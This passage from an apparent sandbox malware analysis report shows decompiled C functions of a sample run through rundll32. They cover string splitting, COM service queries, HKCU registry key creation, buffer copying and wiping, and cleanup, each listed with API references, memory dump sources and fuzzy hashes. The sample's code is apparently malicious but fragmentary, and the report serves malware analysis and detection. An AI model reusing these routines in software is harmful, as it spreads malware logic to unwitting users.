				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E03436D63(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x3439284); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                                0x03436e71
                                0x03436e7e
                                0x03436e80
                                0x03436e81
                                0x03436e89
                                0x03436e89
                                0x03436e8d
                                0x00000000
                                0x00000000
                                0x03436e84
                                0x03436e85
                                0x03436e88
                                0x03436e88
                                0x03436e95
                                0x03436e9a
                                0x03436e9f
                                0x03436ea7
                                0x03436ead
                                0x03436eaf
                                0x03436eb2
                                0x03436eb6
                                0x03436eb8
                                0x03436ebb
                                0x03436ebb
                                0x03436ebc
                                0x03436ebe
                                0x03436ebb
                                0x03436ec8
                                0x03436ecb
                                0x03436ece
                                0x03436ecf
                                0x03436ed1
                                0x03436ed8
                                0x03436ed8
                                0x03436ee4

                                APIs
                                • StrChrA.SHLWAPI(?,00000020,00000000,055E95AC,?,?,034376A6,?,055E95AC), ref: 03436E89
                                • StrTrimA.SHLWAPI(?,03439284,00000002,?,034376A6,?,055E95AC), ref: 03436EA7
                                • StrChrA.SHLWAPI(?,00000020,?,034376A6,?,055E95AC), ref: 03436EB2
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Trim
                                • String ID:
                                • API String ID: 3043112668-0
                                • Opcode ID: 592119b8ce5cdb3d1be46fff9450ee7421247fd173f6129dab2345b9e475074d
                                • Instruction ID: 0d7384d030434513a5871a2506e54572d950b859a342aed6e748a859a5350422
                                • Opcode Fuzzy Hash: 592119b8ce5cdb3d1be46fff9450ee7421247fd173f6129dab2345b9e475074d
                                • Instruction Fuzzy Hash: 3601B5713053577EE720DA2ACC86F677B9DEBCE650F0A0013E955CF282D674C806C664
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03437928 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 48COMMON
                                Download Yara Rule
                                C-Code - Quality: 64%
                                			E03437928(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t14;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t14 = E03433F07(_a4, _t26, __edi); // executed
				_t28 = _t14;
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x343a348; // 0x21ad5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x343b4e0; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x343b8f4; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E034323AA();
					_push( &_v64);
					if( *0x343a100() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E034323AA();
				}
				return _t28;
			}















                                0x03437928
                                0x0343792f
                                0x03437938
                                0x0343793d
                                0x03437941
                                0x0343794b
                                0x03437950
                                0x03437955
                                0x0343795a
                                0x03437964
                                0x0343796e
                                0x0343796e
                                0x03437966
                                0x03437966
                                0x03437966
                                0x03437966
                                0x03437974
                                0x0343797a
                                0x0343797b
                                0x0343797e
                                0x03437981
                                0x03437984
                                0x0343798c
                                0x03437995
                                0x0343799d
                                0x0343799d
                                0x0343799f
                                0x034379a1
                                0x034379a1
                                0x034379ab

                                APIs
                                  • Part of subcall function 03433F07: SysAllocString.OLEAUT32(00000000), ref: 03433F61
                                  • Part of subcall function 03433F07: SysAllocString.OLEAUT32(0070006F), ref: 03433F75
                                  • Part of subcall function 03433F07: SysAllocString.OLEAUT32(00000000), ref: 03433F87
                                • memset.NTDLL ref: 0343794B
                                • GetLastError.KERNEL32 ref: 03437997
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: AllocString$ErrorLastmemset
                                • String ID: <
                                • API String ID: 3736384471-4251816714
                                • Opcode ID: 3d2a804e7334c906c98a7b2c0887742e100d8795595b267312b0cf35c30b3645
                                • Instruction ID: 04dee793b2c6a8af6148dc73c5b35317f1559655affbfbd956286e05a91bdbc4
                                • Opcode Fuzzy Hash: 3d2a804e7334c906c98a7b2c0887742e100d8795595b267312b0cf35c30b3645
                                • Instruction Fuzzy Hash: 5E012D75900218AFDB10EFA9D885FDEBBF8EF09750F444126F954EF200D77095048B95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348B7A4 Relevance: 4.5, APIs: 3, Instructions: 40registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • RegCreateKeyA.ADVAPI32(80000001,0616B7F0,?), ref: 0348B7B9
                                • RegOpenKeyA.ADVAPI32(80000001,0616B7F0,?), ref: 0348B7C3
                                • lstrlen.KERNEL32(0616B7F0,00000000,00000000,00000000,?,0348A2EB,00000001,?,00000000,00000000,00000000,?,0347109E,03499F2C,00000008,00000003), ref: 0348B7E2
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateOpenlstrlen
                                • String ID:
                                • API String ID: 2865187142-0
                                • Opcode ID: 15a8aefdaea5dd636f2c24f9b17a376f5797d6923db292fc8d6aeefe8cb1738c
                                • Instruction ID: 717a9022fef08a53b84d1a832f5942a6b30c4fe590c0c440021c801f0ed405a8
                                • Opcode Fuzzy Hash: 15a8aefdaea5dd636f2c24f9b17a376f5797d6923db292fc8d6aeefe8cb1738c
                                • Instruction Fuzzy Hash: 59F04976100208BFE711AF91DC88EAF7BACEB56694F14810AFD069D340D6719684C6A4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348E831 Relevance: 4.5, APIs: 3, Instructions: 18memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SetEvent.KERNEL32(000005BC,0348C3DB), ref: 0348E83B
                                  • Part of subcall function 034734FF: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0348E846), ref: 03473528
                                  • Part of subcall function 034734FF: RtlDeleteCriticalSection.NTDLL(0349A3E0), ref: 0347355B
                                  • Part of subcall function 034734FF: RtlDeleteCriticalSection.NTDLL(0349A400), ref: 03473562
                                  • Part of subcall function 034734FF: ReleaseMutex.KERNEL32(000005CC,00000000,?,?,?,0348E846), ref: 0347358B
                                  • Part of subcall function 034734FF: FindCloseChangeNotification.KERNEL32(?,?,0348E846), ref: 03473597
                                  • Part of subcall function 034734FF: ResetEvent.KERNEL32(00000000,00000000,?,?,?,0348E846), ref: 034735A3
                                  • Part of subcall function 034734FF: CloseHandle.KERNEL32(?,?,0348E846), ref: 034735AF
                                  • Part of subcall function 034734FF: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0348E846), ref: 034735B5
                                  • Part of subcall function 034734FF: SleepEx.KERNEL32(00000064,00000001,?,?,0348E846), ref: 034735C9
                                  • Part of subcall function 034734FF: HeapFree.KERNEL32(00000000,00000000,?,?,0348E846), ref: 034735ED
                                  • Part of subcall function 034734FF: RtlRemoveVectoredExceptionHandler.NTDLL(034B05B8), ref: 03473623
                                  • Part of subcall function 034734FF: SleepEx.KERNEL32(00000064,00000001,?,?,0348E846), ref: 0347363F
                                • CloseHandle.KERNEL32(000005BC), ref: 0348E850
                                • HeapDestroy.KERNELBASE(05D70000), ref: 0348E860
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$Close$CriticalDeleteEventHandleHeapSection$ChangeDestroyExceptionFindFreeHandlerMutexNotificationReleaseRemoveResetVectored
                                • String ID:
                                • API String ID: 3503058985-0
                                • Opcode ID: a4179b18af5b2c201269cc85b6644a17d5953791544ab8c138539ebdba54c45a
                                • Instruction ID: c3befed2186f3ec76186d6a30475861715d75a62d9fc6d5544b768576931b1ae
                                • Opcode Fuzzy Hash: a4179b18af5b2c201269cc85b6644a17d5953791544ab8c138539ebdba54c45a
                                • Instruction Fuzzy Hash: 51E012707002419FDB21FF36D84DE0F33D86B1164174D086BB405FF208DB20D480E694
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03432575 Relevance: 3.8, APIs: 3, Instructions: 82COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E03432575(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E03436D63(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x343a378, 0x110);
					_t27 =  *0x343a37c; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E0343138A(0x110, _a4, _a4, _t27, 0);
					}
					if(E03436BF2( &_v36) != 0) {
						_t35 = E03435FBB(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
						if(_t35 == 0) {
							_t55 = _v20;
							_v36 =  *_t46;
							_t38 = E034313C7(_t55, _a8, _t51, _t46, _a12); // executed
							_v16 = _t38;
							 *(_t55 + 4) = _v36;
							memset(_t55, 0, _v12 - (_t46[4] & 0xf));
							_t57 = _t57 + 0xc;
							E03436C2C(_t55);
						}
					}
					memset(_a4, 0, _t53);
					E03436C2C(_a4);
				}
				return _v16;
			}
















                                0x0343257b
                                0x03432580
                                0x0343258d
                                0x03432590
                                0x03432593
                                0x03432598
                                0x0343259d
                                0x034325ab
                                0x034325b0
                                0x034325b5
                                0x034325ba
                                0x034325bc
                                0x034325c5
                                0x034325c5
                                0x034325d4
                                0x034325e9
                                0x034325f0
                                0x034325f7
                                0x034325fd
                                0x03432603
                                0x0343260b
                                0x03432611
                                0x03432621
                                0x03432626
                                0x0343262a
                                0x0343262a
                                0x034325f0
                                0x03432635
                                0x03432640
                                0x03432640
                                0x0343264c

                                APIs
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                • memcpy.NTDLL(00000000,00000110,?,?,?,?,?,?,?,03434493,?), ref: 034325AB
                                • memset.NTDLL ref: 03432621
                                • memset.NTDLL ref: 03432635
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: memset$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 1529149438-0
                                • Opcode ID: 31ef8deee4daa51fd6874bc32764ad62e4a900608a4c6daa07723f20ec92933e
                                • Instruction ID: 3105622c2b276cb791d17fe77e8e243cdc12df78aec678e6285081965bd45825
                                • Opcode Fuzzy Hash: 31ef8deee4daa51fd6874bc32764ad62e4a900608a4c6daa07723f20ec92933e
                                • Instruction Fuzzy Hash: 66212175900214BFDF11EF66CC40FAEBBB8EF0E640F04445AF904AF250D675D6018BA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03431F7A Relevance: 3.1, APIs: 2, Instructions: 149serviceCOMMON
                                Download Yara Rule
                                C-Code - Quality: 38%
                                			E03431F7A(intOrPtr _a4) {
				void* _v12;
				char _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				short _t73;
				intOrPtr* _t74;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t82;
				char* _t98;
				intOrPtr _t100;
				void* _t106;
				void* _t108;
				intOrPtr _t112;

				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0x343a348; // 0x21ad5a8
				_t4 = _t49 + 0x343b448; // 0x55e89f0
				_t82 = 0;
				_t5 = _t49 + 0x343b438; // 0x9ba05972
				_t51 =  *0x343a170(_t5, 0, 4, _t4,  &_v20); // executed
				_t106 = _t51;
				if(_t106 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t98 =  &_v48;
					_push(_t98);
					_push(_t98);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0x343a348; // 0x21ad5a8
						_t30 = _t56 + 0x343b428; // 0x55e89d0
						_t31 = _t56 + 0x343b458; // 0x4c96be40
						_t58 =  *0x343a10c(_v12, _t31, _t30,  &_v24); // executed
						_t106 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t106 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t106 >= 0) {
							_t112 = _v16;
							if(_t112 == 0) {
								_t106 = 0x80004005;
								goto L11;
							} else {
								if(_t112 <= 0) {
									L11:
									if(_t106 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = 3;
										_v48 = _t73;
										_t74 = _v20;
										_v40 = _t82;
										_t108 = _t108 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t106 =  *((intOrPtr*)( *_t74 + 0x20))(_t74,  &_v12);
										if(_t106 < 0) {
											goto L7;
										} else {
											_t77 =  *0x343a348; // 0x21ad5a8
											_t23 = _t77 + 0x343b428; // 0x55e89d0
											_t24 = _t77 + 0x343b458; // 0x4c96be40
											_t106 =  *0x343a10c(_v12, _t24, _t23,  &_v24);
											_t80 = _v12;
											 *((intOrPtr*)( *_t80 + 8))(_t80);
											if(_t106 >= 0) {
												L12:
												_t63 = _v24;
												_t106 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t106 >= 0) {
													_t100 =  *0x343a348; // 0x21ad5a8
													_t67 = _v28;
													_t40 = _t100 + 0x343b418; // 0x214e3
													_t106 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t82 = _t82 + 1;
									} while (_t82 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t106;
			}


































                                0x03431f85
                                0x03431f8c
                                0x03431f8d
                                0x03431f8e
                                0x03431f8f
                                0x03431f95
                                0x03431f9a
                                0x03431fa3
                                0x03431fa6
                                0x03431fad
                                0x03431fb3
                                0x03431fb7
                                0x03431fbd
                                0x03431fc5
                                0x03431fc6
                                0x03431fcb
                                0x03431fcc
                                0x03431fce
                                0x03431fd1
                                0x03431fd2
                                0x03431fd3
                                0x03431fd9
                                0x0343206f
                                0x03432074
                                0x0343207b
                                0x03432085
                                0x0343208b
                                0x0343208d
                                0x03432093
                                0x00000000
                                0x03431fdf
                                0x03431fdf
                                0x03431fe6
                                0x03431fef
                                0x03431ff3
                                0x03431ff9
                                0x03431ffc
                                0x03432064
                                0x00000000
                                0x03431ffe
                                0x03431ffe
                                0x03432096
                                0x03432098
                                0x00000000
                                0x00000000
                                0x03432004
                                0x03432004
                                0x03432006
                                0x0343200b
                                0x0343200f
                                0x03432012
                                0x03432017
                                0x0343201f
                                0x03432020
                                0x03432021
                                0x03432023
                                0x03432027
                                0x0343202b
                                0x00000000
                                0x0343202d
                                0x03432031
                                0x03432036
                                0x0343203d
                                0x0343204d
                                0x0343204f
                                0x03432055
                                0x0343205a
                                0x0343209a
                                0x0343209a
                                0x034320a7
                                0x034320ab
                                0x034320b0
                                0x034320b6
                                0x034320bb
                                0x034320c5
                                0x034320c7
                                0x034320cd
                                0x034320cd
                                0x034320d0
                                0x034320d6
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0343205a
                                0x00000000
                                0x0343205c
                                0x0343205c
                                0x0343205d
                                0x00000000
                                0x03432062
                                0x03431ffe
                                0x03431ffc
                                0x03431ff3
                                0x034320d9
                                0x034320d9
                                0x034320df
                                0x034320df
                                0x034320e8

                                APIs
                                • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,055E89D0,03433F35,?,?,?,?,?,?,?,?,?,?,?,03433F35), ref: 03432047
                                • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,055E89D0,03433F35,?,?,?,?,?,?,?,03433F35,00000000,00000000,00000000,006D0063), ref: 03432085
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: QueryServiceUnknown_
                                • String ID:
                                • API String ID: 2042360610-0
                                • Opcode ID: 1bdf7446f7ed1ed8063cd57e11bd6d1395e09efc75c59aee2d15ae1c4291208b
                                • Instruction ID: d0e333b9106e25a68c3bd69ae8d391effda55839edc7ec0e713ce88d1b2474be
                                • Opcode Fuzzy Hash: 1bdf7446f7ed1ed8063cd57e11bd6d1395e09efc75c59aee2d15ae1c4291208b
                                • Instruction Fuzzy Hash: 0C513F75900219AFCB00DFE4C888EEEB7B8FF4D710B148959EA05EF250D671AD45CBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034346CB Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                Download Yara Rule
                                C-Code - Quality: 75%
                                			E034346CB(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E034374FE(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x343a348; // 0x21ad5a8
						_t20 = _t68 + 0x343b1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E034365D1(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                0x034346d1
                                0x034346d4
                                0x034346e4
                                0x034346ed
                                0x034346f1
                                0x034347bf
                                0x034347c5
                                0x034347c5
                                0x0343470b
                                0x03434710
                                0x03434714
                                0x0343471a
                                0x0343471f
                                0x03434726
                                0x03434735
                                0x03434735
                                0x03434739
                                0x0343473b
                                0x03434747
                                0x03434752
                                0x0343475d
                                0x03434761
                                0x0343476b
                                0x0343476f
                                0x03434771
                                0x03434776
                                0x0343477d
                                0x0343478d
                                0x0343478d
                                0x03434776
                                0x0343476f
                                0x0343478f
                                0x03434794
                                0x03434799
                                0x03434799
                                0x0343479c
                                0x034347a5
                                0x034347aa
                                0x034347aa
                                0x034347af
                                0x034347b4
                                0x034347b4
                                0x034347af
                                0x03434739
                                0x034347b6
                                0x034347bc
                                0x00000000

                                APIs
                                  • Part of subcall function 034374FE: SysAllocString.OLEAUT32(80000002), ref: 0343755B
                                  • Part of subcall function 034374FE: SysFreeString.OLEAUT32(00000000), ref: 034375C1
                                • SysFreeString.OLEAUT32(?), ref: 034347AA
                                • SysFreeString.OLEAUT32(03433520), ref: 034347B4
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: String$Free$Alloc
                                • String ID:
                                • API String ID: 986138563-0
                                • Opcode ID: 0427ecd0c3a0507cd6f8372526745ea181610c3c0e06cad6deb733675f2b32e8
                                • Instruction ID: e61a63f0f5238773d430f7138185c5fccdbba4127c6c92dd3b9f8bfe9a369efa
                                • Opcode Fuzzy Hash: 0427ecd0c3a0507cd6f8372526745ea181610c3c0e06cad6deb733675f2b32e8
                                • Instruction Fuzzy Hash: 84315979500118AFCB21EFAAC888CDBBBBAEBCA7507244659F9059B310D7319D51CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03435634 Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                                Download Yara Rule
                                C-Code - Quality: 50%
                                			E03435634(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0x343a348; // 0x21ad5a8
				_t2 = _t42 + 0x343b468; // 0x20400
				_push(0);
				_push(__eax);
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0x343a348; // 0x21ad5a8
					_t6 = _t45 + 0x343b488; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0x343a348; // 0x21ad5a8
							_t30 = _v8;
							_t12 = _t48 + 0x343b478; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}


















                                0x03435640
                                0x03435641
                                0x03435647
                                0x0343564e
                                0x03435650
                                0x03435654
                                0x03435658
                                0x0343565a
                                0x03435663
                                0x03435669
                                0x03435671
                                0x03435673
                                0x03435677
                                0x03435679
                                0x03435686
                                0x0343568a
                                0x0343568f
                                0x03435695
                                0x0343569a
                                0x034356a2
                                0x034356a4
                                0x034356a6
                                0x034356ac
                                0x034356ac
                                0x034356af
                                0x034356b5
                                0x034356b5
                                0x034356b8
                                0x034356be
                                0x034356be
                                0x034356c5

                                APIs
                                • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 03435671
                                • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 034356A2
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Interface_ProxyQueryUnknown_
                                • String ID:
                                • API String ID: 2522245112-0
                                • Opcode ID: b318840ef9243cfd0f2564ded2cb53649658bd4c4e8c9528c47fb4e80453d7dc
                                • Instruction ID: 975ec15e9ae25a47ee81bced2abab20d0b19ff4c9c9841fff40e0fdc5e856d1d
                                • Opcode Fuzzy Hash: b318840ef9243cfd0f2564ded2cb53649658bd4c4e8c9528c47fb4e80453d7dc
                                • Instruction Fuzzy Hash: 0F21E275900619EFCB00DBA4C444E9AF779EF89714B148698ED45EF324D631ED41CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03483223 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000,?), ref: 03483253
                                • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000), ref: 0348329A
